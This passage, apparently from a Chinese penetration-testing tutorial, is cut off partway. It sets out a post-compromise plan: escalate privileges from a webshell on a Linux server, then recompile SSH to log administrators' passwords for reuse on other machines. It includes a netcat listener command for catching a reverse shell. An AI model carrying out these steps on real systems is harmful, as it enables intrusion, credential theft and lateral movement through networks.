0x01 场景 现在有个攻击场景,就是你拿到了linux外网服务器的webshell,要做内网渗透前肯定要收集信息.其中可以做的一个工作是重新编译ssh来记录管理员的密码信息,信息可以用来撞其他机器的密码.下面就从linux的提权开始 0x02 过程 反弹shell linux下为啥要反弹出一个shell来提权,这个你可以用webshell来执行一次溢出exp. 自己外网服务器 nc -l -vv -p 1234 ,监听1234端口 webshell如果能访问外网,则用bash,python,p…